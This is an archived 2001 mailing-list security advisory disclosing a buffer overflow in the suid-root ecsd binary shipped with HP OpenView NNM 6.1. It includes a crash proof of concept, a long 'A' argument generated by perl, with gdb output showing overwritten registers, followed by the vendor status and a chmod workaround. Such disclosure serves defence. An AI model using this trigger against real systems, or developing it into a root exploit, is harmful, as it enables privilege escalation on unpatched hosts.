OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jonas Eriksson (jesekure.net)
Date: Wed May 23 2001 - 11:00:57 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    HP OpenView NNM v6.1 buffer overflow

    The problem..

    HP OpenView NNM v6.1 has a buffer overflow in the suid-root file ecsd
    located in the /opt/OV/bin/ directory.

    ecsd is not used in NNM, but is shipped and installed suid-root as default.

    Details..

    jeopenview~> uname -a
    SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
    jeopenview~> ls -la /opt/OV/bin/ecsd
    -r-sr-xr-x 1 root bin 2953640 maj 18 11:20 /opt/OV/bin/ecsd
    jeopenview~> pwd
    /
    jeopenview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
    Failed to restore engine
    configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
    jeopenview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
    Segmentation fault (core dumped)
    jeopenview~> gdb /opt/OV/bin/ecsd --core=core
    [snip..]
    Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
    [snip..]
    #0 0x28eb8 in main ()
    (gdb) inf reg
    [snip..]
    l1 0x41414141 1094795585
    l2 0x41414141 1094795585
    l3 0x41414141 1094795585
    l4 0x41414141 1094795585
    l5 0x41414141 1094795585
    l6 0x41414141 1094795585
    l7 0x41414141 1094795585
    i0 0x41414141 1094795585
    i1 0x41414141 1094795585
    i2 0x41414141 1094795585
    i3 0x41414141 1094795585
    i4 0x41414141 1094795585
    i5 0x41414141 1094795585
    fp 0x41410028 1094778920
    [snip..]
    (gdb)

    Vendor Status..

    Hewlett-Packard has been contacted. They are currently working on patches
    for this vulnerability.

    Workaround..

    chmod -s /opt/OV/bin/ecsd
    This will remove the setuid bit from /opt/OV/bin/ecsd, therefore if
    someone does exploit this vulnerability, they won't gain higher privileges.

    Regards
    Jonas Eriksson